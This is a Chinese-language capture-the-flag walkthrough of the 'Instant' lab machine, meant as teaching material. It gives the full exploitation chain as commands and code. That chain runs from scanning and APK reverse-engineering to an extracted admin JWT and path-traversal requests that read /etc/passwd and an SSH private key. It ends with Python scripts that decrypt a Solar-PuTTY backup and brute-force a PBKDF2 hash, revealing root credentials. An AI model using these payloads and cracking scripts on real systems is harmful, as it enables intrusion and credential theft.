Linux渗透实战：Instant靶机渗透教学文档

1. 信息收集阶段

1.1 初始扫描

使用nmap进行快速端口扫描：

nmap -sT --min-rate 10000 -p- 10.10.11.37

发现开放端口：

• 22/tcp (SSH)
• 80/tcp (HTTP)
• 多个过滤端口

1.2 详细扫描

对开放端口进行详细扫描：

nmap -sTVC -O -p22,80 10.10.11.37

发现：

• OpenSSH 9.6p1 Ubuntu
• Apache httpd 2.4.58 (Ubuntu)
• 网站标题为"Instant Wallet"

2. Web应用分析

2.1 网站访问

访问80端口发现一个下载链接，获取到instant.apk文件

2.2 目录爆破

使用gobuster和ffuf进行目录和子域名爆破：

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://instant.htb/

ffuf -c -w /usr/share/wordlists/amass/subdomains-top1mil-110000.txt -u 'http://instant.htb' -H "Host:FUZZ.instant.htb"

未发现有效信息

3. APK文件分析

3.1 使用apktool解包

apktool d instant.apk

3.2 搜索关键信息

搜索与目标域名相关的信息：

grep -R -i instant.htb ./

发现：

• support@instant.htb
• mywalletv1.instant.htb
• swagger-ui.instant.htb

4. Swagger API利用

4.1 用户注册

curl -X POST "http://swagger-ui.instant.htb/api/v1/register" \
-H "accept: application/json" \
-H "Content-Type: application/json" \
-d "{ \"email\": \"string@qq.com\", \"password\": \"redteam\", \"pin\": \"12345\", \"username\": \"redteam\"}"

4.2 用户登录获取token

curl -X POST "http://swagger-ui.instant.htb/api/v1/login" \
-H "accept: application/json" \
-H "Content-Type: application/json" \
-d "{ \"password\": \"redteam\", \"username\": \"redteam\"}"

4.3 从APK中提取管理员token

在APK文件中搜索"authorizations"找到管理员token：

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA

5. 目录遍历漏洞利用

5.1 读取/etc/passwd

curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" \
-H "accept: application/json" \
-H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"

发现用户：shirohige

5.2 读取SSH私钥

curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fshirohige%2F.ssh%2Fid_rsa" \
-H "accept: application/json" \
-H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"

5.3 使用awk处理私钥

cat sou | awk -F'\"' '{print $2}' | awk -F '\' '{print $1}'

6. 建立SSH连接

使用获取的私钥连接SSH：

ssh shirohige@10.10.11.37 -i id_rsa

7. 权限提升

7.1 端口转发

发现本地端口8888和8808：

ssh shirohige@10.10.11.37 -i id_rsa -L 8888:127.0.0.1:8888
ssh shirohige@10.10.11.37 -i id_rsa -L 8808:127.0.0.1:8808

7.2 查找备份文件

find / -name '*backup*' 2>/dev/null

发现Solar-PuTTY会话备份文件

7.3 解密Solar-PuTTY会话

使用以下Python脚本解密：

import base64
import sys
from Crypto.Cipher import DES3
from Crypto.Protocol.KDF import PBKDF2

def decrypt(passphrase, ciphertext):
    data = ''
    try:
        # Decode the base64 encoded ciphertext
        array = base64.b64decode(ciphertext)
        salt = array[:24]
        iv = array[24:32]
        encrypted_data = array[48:]
        
        # Derive the key using PBKDF2
        key = PBKDF2(passphrase, salt, dkLen=24, count=1000)
        
        # Create the Triple DES cipher in CBC mode
        cipher = DES3.new(key, DES3.MODE_CBC, iv)
        
        # Decrypt the data
        decrypted_data = cipher.decrypt(encrypted_data)
        
        # Remove padding (PKCS7 padding)
        padding_len = decrypted_data[-1]
        decrypted_data = decrypted_data[:-padding_len]
        
        data = ''.join(chr(c) for c in decrypted_data if chr(c).isascii())
    except Exception as e:
        print(f'Error: {e}')
    return data

if len(sys.argv) < 3:
    print(f'Usage: {sys.argv[0]} putty_session.dat wordlist.txt')
    exit(1)

with open(sys.argv[1]) as f:
    cipher = f.read()

with open(sys.argv[2]) as passwords:
    for i, password in enumerate(passwords):
        password = password.strip()
        decrypted = decrypt(password, cipher)
        print(f'[{i}] {password=}', end='\r')
        if 'Credentials' in decrypted:
            print(f'\r[{i}] {password=10}')
            print()
            print(decrypted)
            break

执行：

python3 exp.py sessions-backup.dat /usr/share/wordlists/rockyou.txt

获得root凭据：

"Username":"root","Password":"12**24nzC!r0c%q12"

7.4 数据库密码破解

发现PBKDF2哈希：

pbkdf2:sha256:600000$I5bFyb0ZzD69pNX8$e9e4ea5c280e0766612295ab9bff32e5fa1de8f6cbb6586fab7ab7bc762bd978

使用以下脚本破解：

import hashlib
import binascii
import base64

def pbkdf2_hash(password, salt, iterations=600000, dklen=32):
    # dklen 默认为哈希值长度
    hash_value = hashlib.pbkdf2_hmac(
        'sha256',  # 使用 SHA-256 算法
        password.encode('utf-8'),
        salt,
        iterations,
        dklen
    )
    return hash_value

def find_matching_password(dictionary_file, target_hash, salt, iterations=600000, dklen=32):
    # 将目标哈希值从十六进制字符串转换为字节串
    target_hash_bytes = binascii.unhexlify(target_hash)
    
    with open(dictionary_file, 'r', encoding='utf-8') as file:
        for line in file:
            password = line.strip()  # 去除每行密码的空格或换行符
            hash_value = pbkdf2_hash(password, salt, iterations, dklen)
            if hash_value == target_hash_bytes:
                print(f"Found password: {password}")
                return password
    
    print("Password not found.")
    return None

# 解析输入数据
salt = base64.b64decode('I5bFyb0ZzD69pNX8')  # 解码 Base64 盐值
target_hash = 'e9e4ea5c280e0766612295ab9bff32e5fa1de8f6cbb6586fab7ab7bc762bd978'
dictionary_file = '/usr/share/wordlists/rockyou.txt'  # 字典文件路径

# 调用破解函数
find_matching_password(dictionary_file, target_hash, salt)

8. 总结

1. 初始信息收集发现Web应用和APK文件
2. APK分析发现隐藏子域名和API端点
3. 通过API注册用户获取基本访问权限
4. 从APK中提取管理员token提升权限
5. 利用目录遍历漏洞读取系统文件和SSH私钥
6. 通过SSH私钥获取初始立足点
7. 在系统内查找备份文件并解密获取root凭据
8. 尝试破解数据库密码哈希

关键点：

• APK逆向分析是突破口
• API端点发现和利用
• 目录遍历漏洞利用
• Solar-PuTTY会话解密
• PBKDF2哈希破解